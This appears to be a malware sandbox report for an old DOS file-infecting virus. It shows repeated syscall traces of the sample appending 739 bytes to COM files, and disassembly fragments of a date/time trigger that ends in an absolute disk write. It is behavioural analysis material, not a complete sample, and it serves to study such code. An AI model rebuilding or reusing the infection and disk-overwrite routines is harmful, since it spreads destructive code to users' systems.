Sample viewer

vx.netlux.org/Virus.DOS.Ash.743.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:46:30.485308255Z 26 PC: 14146 | Set disk transfer address
2018-12-17T22:46:30.495299159Z 78 PC: 1419c | Find first file
2018-12-17T22:46:30.502916733Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:46:30.526234529Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.533903419Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.536549511Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.539862335Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.564700219Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.566371444Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.574071522Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.583029665Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.586582805Z 61 PC: 141a8 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:46:30.59371052Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.600633501Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.603204755Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.606934781Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.615824797Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.618680573Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.626114326Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.635532374Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.639206578Z 61 PC: 141a8 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:46:30.64650702Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.653490738Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.655298827Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.659077753Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.66858212Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.67047682Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.678566368Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.687578766Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.695271793Z 61 PC: 141a8 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:46:30.704528026Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.71157682Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.713071716Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.718786143Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.727772329Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.730331411Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.740964208Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.750734659Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.753902233Z 61 PC: 141a8 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:46:30.762407897Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.771650699Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.773473152Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.777760148Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.787167431Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.78918429Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.797001841Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.807765063Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.813697391Z 61 PC: 141a8 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:46:30.819751214Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.827341304Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.82872592Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.831417604Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.838687766Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.841071092Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.848305173Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.861197323Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.86427304Z 61 PC: 141a8 | Open file (Filename = 'PAH.COM')
2018-12-17T22:46:30.872334425Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.880938454Z 66 PC: 141ce | Move file pointer
2018-12-17T22:46:30.882812253Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.88621834Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-17T22:46:30.896189553Z 66 PC: 141f6 | Move file pointer
2018-12-17T22:46:30.898103294Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:46:30.905681484Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.916044879Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.92060923Z 61 PC: 141a8 | Open file (Filename = 'TEST.COM')
2018-12-17T22:46:30.928382583Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:46:30.931730381Z 62 PC: 14190 | Close file
2018-12-17T22:46:30.934823462Z 79 PC: 1419c | Find next file
2018-12-17T22:46:30.937893498Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-17T22:46:30.940462181Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-17T22:46:30.944155871Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8909,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:13.300748795Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:22:13.302195193Z 78 PC: 1419c | Find first file
2018-12-25T12:22:13.307973004Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:13.314157462Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:13.320967052Z 66 PC: 141ce | Move file pointer
2018-12-25T12:22:13.322570109Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.325237955Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:22:13.34171151Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:22:13.343289457Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.350489585Z 62 PC: 14190 | Close file
2018-12-25T12:22:13.35931962Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.361952952Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.368335538Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.375137152Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.376419751Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.379025203Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.386870201Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.388344791Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.394873182Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.40469237Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.407485337Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.414418818Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.420704057Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.422141425Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.424670554Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.432381804Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.433924924Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.440234074Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.448160485Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.451766066Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.458034942Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.464190085Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.466108911Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.468628926Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.476401958Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.47865597Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.485326545Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.491448858Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.494461117Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.498530367Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.50254742Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.504317817Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.506318416Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.512765741Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.514169067Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.518637778Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.5240583Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.526986696Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.533650087Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.540029895Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.542685202Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.545690456Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.554972085Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.557323956Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.564697233Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.573304959Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.576117181Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.583334341Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.589747565Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.591350668Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.594542981Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.602555015Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.604097369Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.611250428Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.620417262Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.623432502Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.631613794Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.634545263Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.636715927Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.64068797Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:22:13.643130246Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:22:13.645489761Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8909,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:13.503602429Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:22:13.505158556Z 78 PC: 1419c | Find first file
2018-12-25T12:22:13.509516093Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:13.513694889Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:13.517778415Z 66 PC: 141ce | Move file pointer
2018-12-25T12:22:13.519288055Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.521260743Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:22:13.533247371Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:22:13.540223412Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.54456477Z 62 PC: 14190 | Close file
2018-12-25T12:22:13.551083202Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.555474538Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.561173994Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.569107331Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.571316467Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.574686558Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.584388744Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.586571304Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.59449753Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.60431696Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.6073618Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.615594904Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.622857608Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.624587752Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.627767711Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.636940361Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.638875241Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.648266826Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.963950429Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.967285239Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.976120438Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.982771653Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.986725665Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.990271939Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.000449119Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.002265738Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.009510191Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.019688968Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.022551729Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.029947657Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.038390047Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.040265795Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.043580464Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.053197802Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.055019298Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.062654542Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.07296262Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.076556468Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.085415205Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.093074866Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.095906377Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.099263266Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.109259851Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.111816283Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.119395917Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.129052856Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.132872866Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.140511249Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.148433113Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.151054421Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.154521764Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.163664129Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.166126298Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.170418198Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.423787676Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.427584218Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.436475738Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.440895988Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.44343598Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.448430265Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:22:14.451220149Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:22:14.45445313Z 25 PC: 1427a | Get default drive

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8909,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:13.65881671Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:22:13.660944013Z 78 PC: 1419c | Find first file
2018-12-25T12:22:13.667323434Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:13.673995694Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:13.681218058Z 66 PC: 141ce | Move file pointer
2018-12-25T12:22:13.684103983Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.686676786Z 64 PC: 141ed | Write file or device (Write 739 bytes on handle 5)
2018-12-25T12:22:13.70146833Z 66 PC: 141f6 | Move file pointer
2018-12-25T12:22:13.703153618Z 64 PC: 14214 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:22:13.70949978Z 62 PC: 14190 | Close file
2018-12-25T12:22:13.717902803Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.721156461Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.727432894Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.733554323Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.73554101Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.738916551Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.746941691Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.748712904Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.75543496Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.763409365Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.766791005Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.773140537Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.779397367Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.788801808Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.791397456Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.799070636Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.800696392Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.807362204Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.815607606Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.819479349Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.826844501Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.833265735Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.835604311Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.838499627Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.846327292Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.848118309Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.855182965Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.863161566Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.865871035Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.872785631Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.879614243Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.881213217Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.884050668Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:13.892446616Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:13.893880628Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:13.900579338Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:13.910896174Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:13.913940259Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:13.921059451Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:13.927885012Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:13.929543618Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:13.933444773Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.098834723Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.100559826Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.107750325Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.156537014Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.158993777Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.166115391Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.172281322Z 66 PC: 141ce | Move file pointer (See above)
2018-12-25T12:22:14.173491508Z 64 PC: 141e2 | Write file or device (See above)
2018-12-25T12:22:14.176887679Z 64 PC: 141ed | Write file or device (See above)
2018-12-25T12:22:14.193261726Z 66 PC: 141f6 | Move file pointer (See above)
2018-12-25T12:22:14.194612881Z 64 PC: 14214 | Write file or device (See above)
2018-12-25T12:22:14.201979045Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.228601258Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.231167024Z 61 PC: 141a8 | Open file (See above)
2018-12-25T12:22:14.23832924Z 63 PC: 141b7 | Read file or device (See above)
2018-12-25T12:22:14.242306316Z 62 PC: 14190 | Close file (See above)
2018-12-25T12:22:14.244333727Z 79 PC: 1419c | Find next file (See above)
2018-12-25T12:22:14.247786822Z 42 PC: 14242 | Get date 0x14242: cmp dl, 4
0x14245: jne 0x14251
0x14247: cmp dh, 7
0x1424a: jne 0x14251
0x1424c: xor ax, ax
0x1424e: jmp 0x1426f
0x14250: nop
0x14251: mov ah, 0x2c
0x14253: int 0x21
0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
2018-12-25T12:22:14.250113148Z 44 PC: 14255 | Get time 0x14255: or cl, cl
0x14257: jne 0x1427c
0x14259: cmp ch, 6
0x1425c: jge 0x1427c
0x1425e: add cl, ch
0x14260: mov ax, cx
0x14262: cwde
0x14263: add al, dh
0x14265: adc al, dl
0x14267: adc ah, 0
0x1426a: or ax, ax
0x1426c: jne 0x1426f
0x1426e: inc ax
0x1426f: mov dx, ax
0x14271: mov cx, 1
0x14274: xor bx, bx
0x14276: mov ah, 0x19
0x14278: int 0x21
0x1427a: int 0x26
0x1427c: mov bx, 0x31a
2018-12-25T12:22:14.25242328Z 44 PC: 14283 | Get time 0x14283: inc dh
0x14285: cmp dh, byte ptr [0x319]
0x14289: jl 0x14291
0x1428b: sub dh, byte ptr [0x319]
0x1428f: jmp 0x14285
0x14291: mov al, dh
0x14293: mov cl, al
0x14295: cwde
0x14296: shl ax, 1
0x14298: add bx, ax
0x1429a: mov si, word ptr [bx]
0x1429c: mov ch, byte ptr [si - 1]
0x1429f: mov dx, si
0x142a1: mov ah, 9
0x142a3: int 0x21
0x142a5: cmp ch, 0
0x142a8: jne 0x142ac
0x142aa: int 0x20
0x142ac: cmp ch, 1
0x142af: jne 0x142b2

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":6,"Min":0,"Second":0,"TimeBased":true,"OriginalID":8909,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:13.965356111Z 26 PC: 14146 | Set disk transfer address
2018-12-25T12:22:13.967242305Z 78 PC: 1419c | Find first file
2018-12-25T12:22:13.973046265Z 61 PC: 141a8 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:13.979448179Z 63 PC: 141b7 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:13.987006665Z 66 PC: 141ce | Move file pointer
2018-12-25T12:22:13.988460227Z 64 PC: 141e2 | Write file or device (Write 4 bytes on handle 5)
